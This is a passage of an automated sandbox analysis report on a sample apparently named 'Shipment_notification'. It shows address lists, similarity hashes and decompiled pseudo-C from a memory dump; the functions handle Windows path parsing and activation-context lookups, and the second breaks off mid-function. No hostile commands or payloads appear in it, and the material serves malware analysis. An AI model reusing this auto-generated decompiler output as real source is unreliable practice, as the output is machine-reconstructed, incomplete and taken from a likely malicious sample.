                                                                                0x00000000
                                                                                0x01bb5db4
                                                                                0x01bb5db4
                                                                                0x00000000
                                                                                0x01bb5db4
                                                                                0x01bb5dae
                                                                                0x01bb5d88
                                                                                0x01bb5d8d
                                                                                0x01bb6363
                                                                                0x01bb6369
                                                                                0x01bb636a
                                                                                0x01bb6370
                                                                                0x01bb6372
                                                                                0x01bb637a
                                                                                0x01bb637b
                                                                                0x01bb637d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01bb637f
                                                                                0x01bb6385
                                                                                0x00000000
                                                                                0x01bb6385
                                                                                0x01bb5d38
                                                                                0x01bb5d3b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01bb5d3b
                                                                                0x01bb5d27
                                                                                0x01bb5d29
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01bb6360
                                                                                0x00000000
                                                                                0x01bb6360
                                                                                0x01bb5c10
                                                                                0x01bb5c10
                                                                                0x01bb63da
                                                                                0x01bb63e5
                                                                                0x01bb63e5

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1f34018e70198b5c0edab69bc899c2d763b38dbe6e7db2c51f9c562aa04a02ed
                                                                                • Instruction ID: 542140ff78b19d544b18685b09472d24baf2e998beb84138b343c88453414863
                                                                                • Opcode Fuzzy Hash: 1f34018e70198b5c0edab69bc899c2d763b38dbe6e7db2c51f9c562aa04a02ed
                                                                                • Instruction Fuzzy Hash: 89425A71901229CFDB28CF68C880BE9BBB1FF49304F1481EAD94DAB642E7749985CF51
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 92%
                                                                                			E01B04120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
                                                                                				signed int _v8;
                                                                                				void* _v20;
                                                                                				signed int _v24;
                                                                                				char _v532;
                                                                                				char _v540;
                                                                                				signed short _v544;
                                                                                				signed int _v548;
                                                                                				signed short* _v552;
                                                                                				signed short _v556;
                                                                                				signed short* _v560;
                                                                                				signed short* _v564;
                                                                                				signed short* _v568;
                                                                                				void* _v570;
                                                                                				signed short* _v572;
                                                                                				signed short _v576;
                                                                                				signed int _v580;
                                                                                				char _v581;
                                                                                				void* _v584;
                                                                                				unsigned int _v588;
                                                                                				signed short* _v592;
                                                                                				void* _v597;
                                                                                				void* _v600;
                                                                                				void* _v604;
                                                                                				void* _v609;
                                                                                				void* _v616;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				unsigned int _t161;
                                                                                				signed int _t162;
                                                                                				unsigned int _t163;
                                                                                				void* _t169;
                                                                                				signed short _t173;
                                                                                				signed short _t177;
                                                                                				signed short _t181;
                                                                                				unsigned int _t182;
                                                                                				signed int _t185;
                                                                                				signed int _t213;
                                                                                				signed int _t225;
                                                                                				short _t233;
                                                                                				signed char _t234;
                                                                                				signed int _t242;
                                                                                				signed int _t243;
                                                                                				signed int _t244;
                                                                                				signed int _t245;
                                                                                				signed int _t250;
                                                                                				void* _t251;
                                                                                				signed short* _t254;
                                                                                				void* _t255;
                                                                                				signed int _t256;
                                                                                				void* _t257;
                                                                                				signed short* _t260;
                                                                                				signed short _t265;
                                                                                				signed short* _t269;
                                                                                				signed short _t271;
                                                                                				signed short** _t272;
                                                                                				signed short* _t275;
                                                                                				signed short _t282;
                                                                                				signed short _t283;
                                                                                				signed short _t290;
                                                                                				signed short _t299;
                                                                                				signed short _t307;
                                                                                				signed int _t308;
                                                                                				signed short _t311;
                                                                                				signed short* _t315;
                                                                                				signed short _t316;
                                                                                				void* _t317;
                                                                                				void* _t319;
                                                                                				signed short* _t321;
                                                                                				void* _t322;
                                                                                				void* _t323;
                                                                                				unsigned int _t324;
                                                                                				signed int _t325;
                                                                                				void* _t326;
                                                                                				signed int _t327;
                                                                                				signed int _t329;
                                                                                
                                                                                				_t329 = (_t327 & 0xfffffff8) - 0x24c;
                                                                                				_v8 =  *0x1bdd360 ^ _t329;
                                                                                				_t157 = _a8;
                                                                                				_t321 = _a4;
                                                                                				_t315 = __edx;
                                                                                				_v548 = __ecx;
                                                                                				_t305 = _a20;
                                                                                				_v560 = _a12;
                                                                                				_t260 = _a16;
                                                                                				_v564 = __edx;
                                                                                				_v580 = _a8;
                                                                                				_v572 = _t260;
                                                                                				_v544 = _a20;
                                                                                				if( *__edx <= 8) {
                                                                                					L3:
                                                                                					if(_t260 != 0) {
                                                                                						 *_t260 = 0;
                                                                                					}
                                                                                					_t254 =  &_v532;
                                                                                					_v588 = 0x208;
                                                                                					if((_v548 & 0x00000001) != 0) {
                                                                                						_v556 =  *_t315;
                                                                                						_v552 = _t315[2];
                                                                                						_t161 = E01B1F232( &_v556);
                                                                                						_t316 = _v556;
                                                                                						_v540 = _t161;
                                                                                						goto L17;
                                                                                					} else {
                                                                                						_t306 = 0x208;
                                                                                						_t298 = _t315;
                                                                                						_t316 = L01B06E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
                                                                                						if(_t316 == 0) {
                                                                                							L68:
                                                                                							_t322 = 0xc0000033;
                                                                                							goto L39;
                                                                                						} else {
                                                                                							while(_v581 == 0) {
                                                                                								_t233 = _v588;
                                                                                								if(_t316 > _t233) {
                                                                                									_t234 = _v548;
                                                                                									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
                                                                                										_t254 = L01B04620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
                                                                                										if(_t254 == 0) {
                                                                                											_t169 = 0xc0000017;
                                                                                										} else {
                                                                                											_t298 = _v564;
                                                                                											_v588 = _t316;
                                                                                											_t306 = _t316;
                                                                                											_t316 = L01B06E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
                                                                                											if(_t316 != 0) {
                                                                                												continue;
                                                                                											} else {
                                                                                												goto L68;
                                                                                											}
                                                                                										}
                                                                                									} else {
                                                                                										goto L90;
                                                                                									}
                                                                                								} else {
                                                                                									_v556 = _t316;
                                                                                									 *((short*)(_t329 + 0x32)) = _t233;
                                                                                									_v552 = _t254;
                                                                                									if(_t316 < 2) {
                                                                                										L11:
                                                                                										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
                                                                                											_t161 = 5;
                                                                                										} else {
                                                                                											if(_t316 < 6) {
                                                                                												L87:
                                                                                												_t161 = 3;
                                                                                											} else {
                                                                                												_t242 = _t254[2] & 0x0000ffff;
                                                                                												if(_t242 != 0x5c) {
                                                                                													if(_t242 == 0x2f) {
                                                                                														goto L16;
                                                                                													} else {
                                                                                														goto L87;
                                                                                													}
                                                                                													goto L101;
                                                                                												} else {
                                                                                													L16:
                                                                                													_t161 = 2;
                                                                                												}
                                                                                											}
                                                                                										}
                                                                                									} else {
                                                                                										_t243 =  *_t254 & 0x0000ffff;
                                                                                										if(_t243 == 0x5c || _t243 == 0x2f) {
                                                                                											if(_t316 < 4) {
                                                                                												L81:
                                                                                												_t161 = 4;
                                                                                												goto L17;
                                                                                											} else {
                                                                                												_t244 = _t254[1] & 0x0000ffff;
                                                                                												if(_t244 != 0x5c) {
                                                                                													if(_t244 == 0x2f) {
                                                                                														goto L60;
                                                                                													} else {
                                                                                														goto L81;
                                                                                													}
                                                                                												} else {
                                                                                													L60:
                                                                                													if(_t316 < 6) {
                                                                                														L83:
                                                                                														_t161 = 1;
                                                                                														goto L17;
                                                                                													} else {
                                                                                														_t245 = _t254[2] & 0x0000ffff;
                                                                                														if(_t245 != 0x2e) {
                                                                                															if(_t245 == 0x3f) {
                                                                                																goto L62;
                                                                                															} else {
                                                                                																goto L83;
                                                                                															}
                                                                                														} else {
                                                                                															L62:
                                                                                															if(_t316 < 8) {
                                                                                																L85:
                                                                                																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
                                                                                																goto L17;
                                                                                															} else {
                                                                                																_t250 = _t254[3] & 0x0000ffff;
                                                                                																if(_t250 != 0x5c) {
                                                                                																	if(_t250 == 0x2f) {
                                                                                																		goto L64;
                                                                                																	} else {
                                                                                																		goto L85;
                                                                                																	}
                                                                                																} else {
                                                                                																	L64:
                                                                                																	_t161 = 6;
                                                                                																	goto L17;
                                                                                																}
                                                                                															}
                                                                                														}
                                                                                													}
                                                                                												}
                                                                                											}
                                                                                											goto L101;
                                                                                										} else {
                                                                                											goto L11;
                                                                                										}
                                                                                									}
                                                                                									L17:
                                                                                									if(_t161 != 2) {
                                                                                										_t162 = _t161 - 1;
                                                                                										if(_t162 > 5) {
                                                                                											goto L18;
                                                                                										} else {
                                                                                											switch( *((intOrPtr*)(_t162 * 4 +  &M01B045F8))) {
                                                                                												case 0:
                                                                                													_v568 = 0x1ac1078;
                                                                                													__eax = 2;
                                                                                													goto L20;
                                                                                												case 1:
                                                                                													goto L18;
                                                                                												case 2:
                                                                                													_t163 = 4;
                                                                                													goto L19;
                                                                                											}
                                                                                										}
                                                                                										goto L41;
                                                                                									} else {
                                                                                										L18:
                                                                                										_t163 = 0;
                                                                                										L19:
                                                                                										_v568 = 0x1ac11c4;
                                                                                									}
                                                                                									L20:
                                                                                									_v588 = _t163;
                                                                                									_v564 = _t163 + _t163;
                                                                                									_t306 =  *_v568 & 0x0000ffff;
                                                                                									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
                                                                                									_v576 = _t265;
                                                                                									if(_t265 > 0xfffe) {
                                                                                										L90:
                                                                                										_t322 = 0xc0000106;
                                                                                									} else {
                                                                                										if(_t321 != 0) {
                                                                                											if(_t265 > (_t321[1] & 0x0000ffff)) {
                                                                                												if(_v580 != 0) {
                                                                                													goto L23;
                                                                                												} else {
                                                                                													_t322 = 0xc0000106;
                                                                                													goto L39;
                                                                                												}
                                                                                											} else {
                                                                                												_t177 = _t306;
                                                                                												goto L25;
                                                                                											}
                                                                                											goto L101;
                                                                                										} else {
                                                                                											if(_v580 == _t321) {
                                                                                												_t322 = 0xc000000d;
                                                                                											} else {
                                                                                												L23:
                                                                                												_t173 = L01B04620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
                                                                                												_t269 = _v592;
                                                                                												_t269[2] = _t173;
                                                                                												if(_t173 == 0) {
                                                                                													_t322 = 0xc0000017;
                                                                                												} else {
                                                                                													_t316 = _v556;
                                                                                													 *_t269 = 0;
                                                                                													_t321 = _t269;
                                                                                													_t269[1] = _v576;
                                                                                													_t177 =  *_v568 & 0x0000ffff;
                                                                                													L25:
                                                                                													_v580 = _t177;
                                                                                													if(_t177 == 0) {
                                                                                														L29:
                                                                                														_t307 =  *_t321 & 0x0000ffff;
                                                                                													} else {
                                                                                														_t290 =  *_t321 & 0x0000ffff;
                                                                                														_v576 = _t290;
                                                                                														_t310 = _t177 & 0x0000ffff;
                                                                                														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
                                                                                															_t307 =  *_t321 & 0xffff;
                                                                                														} else {
                                                                                															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
                                                                                															E01B2F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
                                                                                															_t329 = _t329 + 0xc;
                                                                                															_t311 = _v580;
                                                                                															_t225 =  *_t321 + _t311 & 0x0000ffff;
                                                                                															 *_t321 = _t225;
                                                                                															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
                                                                                																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                                															}
                                                                                															goto L29;
                                                                                														}
                                                                                													}
                                                                                													_t271 = _v556 - _v588 + _v588;
                                                                                													_v580 = _t307;
                                                                                													_v576 = _t271;
                                                                                													if(_t271 != 0) {
                                                                                														_t308 = _t271 & 0x0000ffff;
                                                                                														_v588 = _t308;
                                                                                														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
                                                                                															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
                                                                                															E01B2F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
                                                                                															_t329 = _t329 + 0xc;
                                                                                															_t213 =  *_t321 + _v576 & 0x0000ffff;
                                                                                															 *_t321 = _t213;
                                                                                															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
                                                                                																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
                                                                                															}
                                                                                														}
                                                                                													}
                                                                                													_t272 = _v560;
                                                                                													if(_t272 != 0) {
                                                                                														 *_t272 = _t321;
                                                                                													}
                                                                                													_t306 = 0;
                                                                                													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                                													_t275 = _v572;
                                                                                													if(_t275 != 0) {
                                                                                														_t306 =  *_t275;
                                                                                														if(_t306 != 0) {
                                                                                															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
                                                                                														}
                                                                                													}
                                                                                													_t181 = _v544;
                                                                                													if(_t181 != 0) {
                                                                                														 *_t181 = 0;
                                                                                														 *((intOrPtr*)(_t181 + 4)) = 0;
                                                                                														 *((intOrPtr*)(_t181 + 8)) = 0;
                                                                                														 *((intOrPtr*)(_t181 + 0xc)) = 0;
                                                                                														if(_v540 == 5) {
                                                                                															_t182 = E01AE52A5(1);
                                                                                															_v588 = _t182;
                                                                                															if(_t182 == 0) {
                                                                                																E01AFEB70(1, 0x1bd79a0);
                                                                                																goto L38;
                                                                                															} else {
                                                                                																_v560 = _t182 + 0xc;
                                                                                																_t185 = E01AFAA20( &_v556, _t182 + 0xc,  &_v556, 1);
                                                                                																if(_t185 == 0) {
                                                                                																	_t324 = _v588;
                                                                                																	goto L97;
                                                                                																} else {
                                                                                																	_t306 = _v544;
                                                                                																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
                                                                                																	 *(_t306 + 4) = _t282;
                                                                                																	_v576 = _t282;
                                                                                																	_t325 = _t316 -  *_v560 & 0x0000ffff;
                                                                                																	 *_t306 = _t325;
                                                                                																	if( *_t282 == 0x5c) {
                                                                                																		_t149 = _t325 - 2; // -2
                                                                                																		_t283 = _t149;
                                                                                																		 *_t306 = _t283;
                                                                                																		 *(_t306 + 4) = _v576 + 2;
                                                                                																		_t185 = _t283 & 0x0000ffff;
                                                                                																	}
                                                                                																	_t324 = _v588;
                                                                                																	 *(_t306 + 2) = _t185;
                                                                                																	if((_v548 & 0x00000002) == 0) {
                                                                                																		L97:
                                                                                																		asm("lock xadd [esi], eax");
                                                                                																		if((_t185 | 0xffffffff) == 0) {
                                                                                																			_push( *((intOrPtr*)(_t324 + 4)));
                                                                                																			E01B295D0();
                                                                                																			L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
                                                                                																		}
                                                                                																	} else {
                                                                                																		 *(_t306 + 0xc) = _t324;
                                                                                																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
                                                                                																	}
                                                                                																	goto L38;
                                                                                																}
                                                                                															}
                                                                                															goto L41;
                                                                                														}
                                                                                													}
                                                                                													L38:
                                                                                													_t322 = 0;
                                                                                												}
                                                                                											}
                                                                                										}
                                                                                									}
                                                                                									L39:
                                                                                									if(_t254 !=  &_v532) {
                                                                                										L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
                                                                                									}
                                                                                									_t169 = _t322;
                                                                                								}
                                                                                								goto L41;
                                                                                							}
                                                                                							goto L68;
                                                                                						}
                                                                                					}
                                                                                					L41:
                                                                                					_pop(_t317);
                                                                                					_pop(_t323);
                                                                                					_pop(_t255);
                                                                                					return L01B2B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
                                                                                				} else {
                                                                                					_t299 = __edx[2];
                                                                                					if( *_t299 == 0x5c) {
                                                                                						_t256 =  *(_t299 + 2) & 0x0000ffff;
                                                                                						if(_t256 != 0x5c) {
                                                                                							if(_t256 != 0x3f) {
                                                                                								goto L2;
                                                                                							} else {
                                                                                								goto L50;
                                                                                							}
                                                                                						} else {
                                                                                							L50:
                                                                                							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
                                                                                								goto L2;
                                                                                							} else {
                                                                                								_t251 = E01B23D43(_t315, _t321, _t157, _v560, _v572, _t305);
                                                                                								_pop(_t319);
                                                                                								_pop(_t326);
                                                                                								_pop(_t257);
                                                                                								return L01B2B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
                                                                                							}
                                                                                						}
                                                                                					} else {
                                                                                						L2:
                                                                                						_t260 = _v572;
                                                                                						goto L3;
                                                                                					}
                                                                                				}
                                                                                				L101:
                                                                                			}
                                                                                0x01b0417b
                                                                                0x00000000
                                                                                0x01b0417b
                                                                                0x01b04175
                                                                                0x00000000

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6b58458bb95e1e319cc0e9721dfc5d95ae51803d06047cdf08c812f6f73a1291
                                                                                • Instruction ID: 11c886d8c557c6699e667f34e513ab2ce08a9fa995aa66c0d66a1acfcda8c6a8
                                                                                • Opcode Fuzzy Hash: 6b58458bb95e1e319cc0e9721dfc5d95ae51803d06047cdf08c812f6f73a1291
                                                                                • Instruction Fuzzy Hash: 43F190706083118FC729CF59C480A7ABBE1FF88754F0589AEF686CB291E735D885CB52
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 92%
                                                                                			E01B120A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
                                                                                				signed int _v16;
                                                                                				signed int _v20;
                                                                                				signed char _v24;
                                                                                				intOrPtr _v28;
                                                                                				signed int _v32;
                                                                                				void* _v36;
                                                                                				char _v48;
                                                                                				signed int _v52;
                                                                                				signed int _v56;
                                                                                				unsigned int _v60;
                                                                                				char _v64;
                                                                                				unsigned int _v68;
                                                                                				signed int _v72;
                                                                                				char _v73;
                                                                                				signed int _v74;
                                                                                				char _v75;
                                                                                				signed int _v76;
                                                                                				void* _v81;
                                                                                				void* _v82;
                                                                                				void* _v89;
                                                                                				void* _v92;
                                                                                				void* _v97;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				void* __ebp;
                                                                                				signed char _t128;
                                                                                				void* _t129;
                                                                                				signed int _t130;
                                                                                				void* _t132;
                                                                                				signed char _t133;
                                                                                				intOrPtr _t135;
                                                                                				signed int _t137;
                                                                                				signed int _t140;
                                                                                				signed int* _t144;
                                                                                				signed int* _t145;
                                                                                				intOrPtr _t146;
                                                                                				signed int _t147;
                                                                                				signed char* _t148;
                                                                                				signed int _t149;
                                                                                				signed int _t153;
                                                                                				signed int _t169;
                                                                                				signed int _t174;
                                                                                				signed int _t180;
                                                                                				void* _t197;
                                                                                				void* _t198;
                                                                                				signed int _t201;
                                                                                				intOrPtr* _t202;
                                                                                				intOrPtr* _t205;
                                                                                				signed int _t210;
                                                                                				signed int _t215;
                                                                                				signed int _t218;
                                                                                				signed char _t221;
                                                                                				signed int _t226;
                                                                                				char _t227;
                                                                                				signed int _t228;
                                                                                				void* _t229;
                                                                                				unsigned int _t231;
                                                                                				void* _t235;
                                                                                				signed int _t240;
                                                                                				signed int _t241;
                                                                                				void* _t242;
                                                                                				signed int _t246;
                                                                                				signed int _t248;
                                                                                				signed int _t252;
                                                                                				signed int _t253;
                                                                                				void* _t254;
                                                                                				intOrPtr* _t256;
                                                                                				intOrPtr _t257;
                                                                                				unsigned int _t262;
                                                                                				signed int _t265;
                                                                                				void* _t267;
                                                                                				signed int _t275;
                                                                                
                                                                                				_t198 = __ebx;
                                                                                				_t267 = (_t265 & 0xfffffff0) - 0x48;
                                                                                				_v68 = __ecx;
                                                                                				_v73 = 0;
                                                                                				_t201 = __edx & 0x00002000;
                                                                                				_t128 = __edx & 0xffffdfff;
                                                                                				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
                                                                                				_v72 = _t128;
                                                                                				if((_t128 & 0x00000008) != 0) {
                                                                                					__eflags = _t128 - 8;
                                                                                					if(_t128 != 8) {
                                                                                						L69:
                                                                                						_t129 = 0xc000000d;
                                                                                						goto L23;
                                                                                					} else {
                                                                                						_t130 = 0;
                                                                                						_v72 = 0;
                                                                                						_v75 = 1;
                                                                                						L2:
                                                                                						_v74 = 1;
                                                                                						_t226 =  *0x1bd8714; // 0x0
                                                                                						if(_t226 != 0) {
                                                                                							__eflags = _t201;
                                                                                							if(_t201 != 0) {
                                                                                								L62:
                                                                                								_v74 = 1;
                                                                                								L63:
                                                                                								_t130 = _t226 & 0xffffdfff;
                                                                                								_v72 = _t130;
                                                                                								goto L3;
                                                                                							}
                                                                                							_v74 = _t201;
                                                                                							__eflags = _t226 & 0x00002000;
                                                                                							if((_t226 & 0x00002000) == 0) {
                                                                                								goto L63;
                                                                                							}
                                                                                							goto L62;
                                                                                						}
                                                                                						L3:
                                                                                						_t227 = _v75;
                                                                                						L4:
                                                                                						_t240 = 0;
                                                                                						_v56 = 0;
                                                                                						_t252 = _t130 & 0x00000100;
                                                                                						if(_t252 != 0 || _t227 != 0) {
                                                                                							_t240 = _v68;
                                                                                							_t132 = E01B12EB0(_t240);
                                                                                							__eflags = _t132 - 2;
                                                                                							if(_t132 != 2) {
                                                                                								__eflags = _t132 - 1;
                                                                                								if(_t132 == 1) {
                                                                                									goto L25;
                                                                                								}
                                                                                								__eflags = _t132 - 6;
                                                                                								if(_t132 == 6) {
                                                                                									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
                                                                                									if( *((short*)(_t240 + 4)) != 0x3f) {
                                                                                										goto L40;
                                                                                									}
                                                                                									_t197 = E01B12EB0(_t240 + 8);
                                                                                									__eflags = _t197 - 2;
                                                                                									if(_t197 == 2) {
                                                                                										goto L25;
                                                                                									}
                                                                                								}
                                                                                								L40:
                                                                                								_t133 = 1;
                                                                                								L26:
                                                                                								_t228 = _v75;
                                                                                								_v56 = _t240;
                                                                                								__eflags = _t133;
                                                                                								if(_t133 != 0) {
                                                                                									__eflags = _t228;
                                                                                									if(_t228 == 0) {
                                                                                										L43:
                                                                                										__eflags = _v72;
                                                                                										if(_v72 == 0) {
                                                                                											goto L8;
                                                                                										}
                                                                                										goto L69;
                                                                                									}
                                                                                									_t133 = E01AE58EC(_t240);
                                                                                									_t221 =  *0x1bd5cac; // 0x16
                                                                                									__eflags = _t221 & 0x00000040;
                                                                                									if((_t221 & 0x00000040) != 0) {
                                                                                										_t228 = 0;
                                                                                										__eflags = _t252;
                                                                                										if(_t252 != 0) {
                                                                                											goto L43;
                                                                                										}
                                                                                										_t133 = _v72;
                                                                                										goto L7;
                                                                                									}
                                                                                									goto L43;
                                                                                								} else {
                                                                                									_t133 = _v72;
                                                                                									goto L6;
                                                                                								}
                                                                                							}
                                                                                							L25:
                                                                                							_t133 = _v73;
                                                                                							goto L26;
                                                                                						} else {
                                                                                							L6:
                                                                                							_t221 =  *0x1bd5cac; // 0x16
                                                                                							L7:
                                                                                							if(_t133 != 0) {
                                                                                								__eflags = _t133 & 0x00001000;
                                                                                								if((_t133 & 0x00001000) != 0) {
                                                                                									_t133 = _t133 | 0x00000a00;
                                                                                									__eflags = _t221 & 0x00000004;
                                                                                									if((_t221 & 0x00000004) != 0) {
                                                                                										_t133 = _t133 | 0x00000400;
                                                                                									}
                                                                                								}
                                                                                								__eflags = _t228;
                                                                                								if(_t228 != 0) {
                                                                                									_t133 = _t133 | 0x00000100;
                                                                                								}
                                                                                								_t229 = E01B24A2C(0x1bd6e40, 0x1b24b30, _t133, _t240);
                                                                                								__eflags = _t229;
                                                                                								if(_t229 == 0) {
                                                                                									_t202 = _a20;
                                                                                									goto L100;
                                                                                								} else {
                                                                                									_t135 =  *((intOrPtr*)(_t229 + 0x38));
                                                                                									L15:
                                                                                									_t202 = _a20;
                                                                                									 *_t202 = _t135;
                                                                                									if(_t229 == 0) {
                                                                                										L100:
                                                                                										 *_a4 = 0;
                                                                                										_t137 = _a8;
                                                                                										__eflags = _t137;
                                                                                										if(_t137 != 0) {
                                                                                											 *_t137 = 0;
                                                                                										}
                                                                                										 *_t202 = 0;
                                                                                										_t129 = 0xc0000017;
                                                                                										goto L23;
                                                                                									} else {
                                                                                										_t242 = _a16;
                                                                                										if(_t242 != 0) {
                                                                                											_t254 = _t229;
                                                                                											memcpy(_t242, _t254, 0xd << 2);
                                                                                											_t267 = _t267 + 0xc;
                                                                                											_t242 = _t254 + 0x1a;
                                                                                										}
                                                                                										_t205 = _a4;
                                                                                										_t25 = _t229 + 0x48; // 0x48
                                                                                										 *_t205 = _t25;
                                                                                										_t140 = _a8;
                                                                                										if(_t140 != 0) {
                                                                                											__eflags =  *((char*)(_t267 + 0xa));
                                                                                											if( *((char*)(_t267 + 0xa)) != 0) {
                                                                                												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
                                                                                											} else {
                                                                                												 *_t140 = 0;
                                                                                											}
                                                                                										}
                                                                                										_t256 = _a12;
                                                                                										if(_t256 != 0) {
                                                                                											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
                                                                                										}
                                                                                										_t257 =  *_t205;
                                                                                										_v48 = 0;
                                                                                										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
                                                                                										_v56 = 0;
                                                                                										_v52 = 0;
                                                                                										_t144 =  *( *[fs:0x30] + 0x50);
                                                                                										if(_t144 != 0) {
                                                                                											__eflags =  *_t144;
                                                                                											if( *_t144 == 0) {
                                                                                												goto L20;
                                                                                											}
                                                                                											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
                                                                                											goto L21;
                                                                                										} else {
                                                                                											L20:
                                                                                											_t145 = 0x7ffe0384;
                                                                                											L21:
                                                                                											if( *_t145 != 0) {
                                                                                												_t146 =  *[fs:0x30];
                                                                                												__eflags =  *(_t146 + 0x240) & 0x00000004;
                                                                                												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
                                                                                													_t147 = E01B07D50();
                                                                                													__eflags = _t147;
                                                                                													if(_t147 == 0) {
                                                                                														_t148 = 0x7ffe0385;
                                                                                													} else {
                                                                                														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
                                                                                													}
                                                                                													__eflags =  *_t148 & 0x00000020;
                                                                                													if(( *_t148 & 0x00000020) != 0) {
                                                                                														_t149 = _v72;
                                                                                														__eflags = _t149;
                                                                                														if(__eflags == 0) {
                                                                                															_t149 = 0x1ac5c80;
                                                                                														}
                                                                                														_push(_t149);
                                                                                														_push( &_v48);
                                                                                														 *((char*)(_t267 + 0xb)) = E01B1F6E0(_t198, _t242, _t257, __eflags);
                                                                                														_push(_t257);
                                                                                														_push( &_v64);
                                                                                														_t153 = E01B1F6E0(_t198, _t242, _t257, __eflags);
                                                                                														__eflags =  *((char*)(_t267 + 0xb));
                                                                                														if( *((char*)(_t267 + 0xb)) != 0) {
                                                                                															__eflags = _t153;
                                                                                															if(_t153 != 0) {
                                                                                																__eflags = 0;
                                                                                																E01B67016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
                                                                                																L01B02400(_t267 + 0x20);
                                                                                															}
                                                                                															L01B02400( &_v64);
                                                                                														}
                                                                                													}
                                                                                												}
                                                                                											}
                                                                                											_t129 = 0;
                                                                                											L23:
                                                                                											return _t129;
                                                                                										}
                                                                                									}
                                                                                								}
                                                                                							}
                                                                                							L8:
                                                                                							_t275 = _t240;
                                                                                							if(_t275 != 0) {
                                                                                								_v73 = 0;
                                                                                								_t253 = 0;
                                                                                								__eflags = 0;
                                                                                								L29:
                                                                                								_push(0);
                                                                                								_t241 = E01B12397(_t240);
                                                                                								__eflags = _t241;
                                                                                								if(_t241 == 0) {
                                                                                									_t229 = 0;
                                                                                									L14:
                                                                                									_t135 = 0;
                                                                                									goto L15;
                                                                                								}
                                                                                								__eflags =  *((char*)(_t267 + 0xb));
                                                                                								 *(_t241 + 0x34) = 1;
                                                                                								if( *((char*)(_t267 + 0xb)) != 0) {
                                                                                									E01B02280(_t134, 0x1bd8608);
                                                                                									__eflags =  *0x1bd6e48 - _t253; // 0x0
                                                                                									if(__eflags != 0) {
                                                                                										L48:
                                                                                										_t253 = 0;
                                                                                										__eflags = 0;
                                                                                										L49:
                                                                                										E01AFFFB0(_t198, _t241, 0x1bd8608);
                                                                                										__eflags = _t253;
                                                                                										if(_t253 != 0) {
                                                                                											L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
                                                                                										}
                                                                                										goto L31;
                                                                                									}
                                                                                									 *0x1bd6e48 = _t241;
                                                                                									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
                                                                                									__eflags = _t253;
                                                                                									if(_t253 != 0) {
                                                                                										_t57 = _t253 + 0x34;
                                                                                										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
